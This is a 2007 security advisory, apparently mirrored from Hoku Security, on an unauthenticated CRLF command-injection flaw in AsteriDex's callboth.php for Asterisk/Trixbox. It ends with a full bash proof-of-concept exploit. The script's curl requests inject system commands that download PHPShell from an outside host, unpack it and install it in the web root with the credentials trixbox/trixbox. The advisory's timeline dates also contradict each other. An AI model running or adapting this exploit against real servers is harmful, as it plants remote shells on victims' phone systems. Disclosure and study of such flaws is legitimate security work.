Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17424
HistoryJul 06, 2007 - 12:00 a.m.

AsteriDex (Asterisk / Trixbox) remote code execution

2007-07-0600:00:00
vulners.com
60

                            Hoku Security 
                        
                        Vulnerability Advisory

Title: AsteriDex remote command execution
Vendor URL: http://bestof.nerdvittles.com/applications/asteridex/
Type: Command injection / remote code execution
Vulnerable
versions: <= 3.0
Risk factor: High
Popularity: Low
Author: Carl Livitt
Contact: [email protected]
Date: 25th June, 2007
Location: http://www.hoku.co.uk/advisories/asteridex.txt


Description:

AsteriDex is a digital rolodex for Asterisk / Trixbox PBXs. There is a
command injection vulnerability which allows unauthenticated users to
execute arbitrary commands on the Asterisk management console. Such
access permits execution of arbitrary operating system commands as the
'asterisk' user.

The software is vulnerable in its default configuration.


Details:

The script 'callboth.php' is used by AsteriDex to bridge a VOIP call
between two end-points. Insufficient parameter checking is done on the
variables IN and OUT, allowing a malicious user to inject arbitrary
commands into the Asterisk management console.

The script works by logging into the console server on port 5038/TCP
on localhost. It then issues an 'Action: Originate' command which is
used to setup the bridged call. The relevant code from callboth.php is:

fputs ($fp, "Action: login\r\n");
fputs ($fp, "Username: phpagi\r\n");
fputs ($fp, "Secret: phpagi\r\n");
fputs ($fp, "Events: off\r\n\r\n");
sleep(1) ;
fputs ($fp, "Action: Originate\r\n");
fputs ($fp, "Channel: $IN\r\n"); << Command injection
fputs ($fp, "Context: custom-callboth\r\n");
fputs ($fp, "Exten: $OUT\r\n"); << Command injection
fputs ($fp, "Priority: 1\r\n\r\n");

$IN is set from $_GET['IN'] with no sanity checking other than a test of
string length; all strings passed to $IN must be less than 100 chars,
including the string 'sip/' which is prepended to $IN prior to the length
check.

Given sane values of $IN=123, $out=321 and $CallerID=567, the session would
look like this:

Action: login
Username: phpagi
Secret: phpagi
Events: off

Action: Originate
Channel: 123
Context: custom-callboth
Exten: 321
Priority: 1

By including CRLF characters in $IN, an attacker can inject arbitrary
commands into the data stream, hijacking the authenticated session to run
commands of the attackers choice. Take, for example, a $IN string containing:

[email protected]\r\nApplication: System\r\nData: echo pwn3d > /tmp/hoku.txt\r\n

This would transform the session into:

Action: login
Username: phpagi
Secret: phpagi
Events: off

Action: Originate
Channel: [email protected]
Application: System
Data: echo pwn3d > /tmp/hoku.txt

Context: custom-callboth
Exten: 321
Priority: 1

This would use the call manager's 'System' functionality to execute user-
supplied operating system commands, in this case writing the word "pwn3d" to a
file called "/tmp/hoku.txt". The rest of the session would fail because the
attacker has subverted the original 'Action', rendering the remaining commands
meaningless to the manager.


Updated Versions:

A patched version of AsteriDex is available from:

http://bestof.nerdvittles.com/applications/asteridex/

Timeline:

mm/dd/yyyy

06/25/2007 Vendor contacted.
06/03/2007 Vendor contacted again, response received.
Details sent to vendor.
06/03/2007 Patch issued and updated version available.
06/05/2007 Advisory released.


Hoku Security:

Our aim is to give you the business assurance that you require in order to
maintain a secure company infrastructure. With clients across the globe in the
UK and USA, we understand the threats posed to your business and provide best of
breed consulting and solutions to secure your interests and protect your bottom
line.

Visit http://www.hoku.co.uk for more information and contact details.


Exploit:

A proof of concept is provided. It downloads PHPshell, installs it into the root
of the vulnerable Asterisk server's web directory and sets a username/password of
trixbox/trixbox. It obeys the 100 char max restriction.

Begin exploit

#!/bin/bash

echo Asteridex PoC Exploit (callboth.php vulnerability)
echo By Carl Livitt / Hoku Security / June 2007
echo

This has to be (a) a valid SIP address, and (b) must answer when dialled.

The exploit will fail without these conditions being met.

Currently uses the Melonite SIP echo test service.

SIP="[email protected]"

Magic number, don't change. The default installation of AsteriDex checks

for this number and fails without it.

SEQ=654321

Other stuff we need

LOC=/asteridex/callboth.php
OUT=123456

Sanity

if [ "$1X" == "X" ]; then
echo Syntax: $0 \<Host IP\[:port\]\>
echo For example: $0 www.example.com:8080
exit 1
fi

Insanity

echo "[-] Exploiting host $1 - please wait"
echo -n '[+]' Building shell script
curl
"http://$1/$LOC?SEQ=$SEQ&amp;OUT=$OUT&amp;IN=$SIP&#37;0d&#37;0aApplication:&#37;20System&#37;0d&#37;0aData:&#37;20echo&#37;20&#92;!/bin/sh&gt;/tmp/t&#37;0d&#37;0a&quot;
&>/dev/null
echo -n .
curl
"http://$1/$LOC?SEQ=$SEQ&amp;OUT=$OUT&amp;IN=$SIP&#37;0d&#37;0aApplication:&#37;20System&#37;0d&#37;0aData:&#37;20echo&#37;20&#37;2dn&#37;20wget&#37;20&#37;2dO&#37;20x.tar.bz2&#37;20&#37;5c&#37;27http://&#37;3e&#37;3e/tmp/t&#37;0d&#37;0a&quot;
&>/dev/null
echo -n .
curl
"http://$1/$LOC?SEQ=$SEQ&amp;OUT=$OUT&amp;IN=$SIP&#37;0d&#37;0aApplication:&#37;20System&#37;0d&#37;0aData:&#37;20echo&#37;20&#37;2dn&#37;20prdownloads.sf.net/phpshell/&#37;3e&#37;3e/tmp/t&#37;0d&#37;0a&quot;
&>/dev/null
echo .
curl
"http://$1/$LOC?SEQ=$SEQ&amp;OUT=$OUT&amp;IN=$SIP&#37;0d&#37;0aApplication:&#37;20System&#37;0d&#37;0aData:&#37;20echo&#37;20phpshell&#37;2d2.1.tar.bz2&#37;3fdownload&#37;5c&#37;27&#37;3e&#37;3e/tmp/t&#37;0d&#37;0a&quot;
&>/dev/null
echo '[+] Executing shell script'
curl
"http://$1/$LOC?SEQ=$SEQ&amp;OUT=$OUT&amp;IN=$SIP&#37;0d&#37;0aApplication:&#37;20System&#37;0d&#37;0aData:&#37;20cd&#37;20/tmp;chmod&#37;20&#37;2bx&#37;20t;./t;tar&#37;20jxf&#37;20x.tar.bz2&#37;0d&#37;0a&quot;
&>/dev/null
echo -n '[+] Setting up phpshell'
curl
"http://$1/$LOC?SEQ=$SEQ&amp;OUT=$OUT&amp;IN=$SIP&#37;0d&#37;0aApplication:&#37;20System&#37;0d&#37;0aData:&#37;20cd&#37;20cd&#37;20/tmp;mv&#37;20phpshell-2.1&#37;20p&#37;0d&#37;0a&quot;
&>/dev/null
echo -n .
curl
"http://$1/$LOC?SEQ=$SEQ&amp;OUT=$OUT&amp;IN=$SIP&#37;0d&#37;0aApplication:&#37;20System&#37;0d&#37;0aData:&#37;20cd&#37;20/tmp/p;echo&#37;20&#37;5c&#37;5busers&#37;5c&#37;5d&gt;config.php&#37;0d&#37;0a&quot;
&>/dev/null
echo -n .
curl
"http://$1/$LOC?SEQ=$SEQ&amp;OUT=$OUT&amp;IN=$SIP&#37;0d&#37;0aApplication:&#37;20System&#37;0d&#37;0aData:&#37;20cd&#37;20/tmp/p;echo&#37;20&#37;27trixbox&#37;3d&#37;22trixbox&#37;22&#37;27&gt;&gt;config.php&#37;0d&#37;0a&quot;
&>/dev/null
echo .
curl
"http://$1/$LOC?SEQ=$SEQ&amp;OUT=$OUT&amp;IN=$SIP&#37;0d&#37;0aApplication:&#37;20System&#37;0d&#37;0aData:&#37;20mv&#37;20/tmp/p&#37;20/var/www/html/phpshell&#37;0d&#37;0a&quot;
&>/dev/null

Have a nice day

echo "Done! You should now be able to browse to http://$1/phpshell/phpshell.php&quot;
echo You can login with the username \'trixbox\' and password \'trixbox\'

End Exploit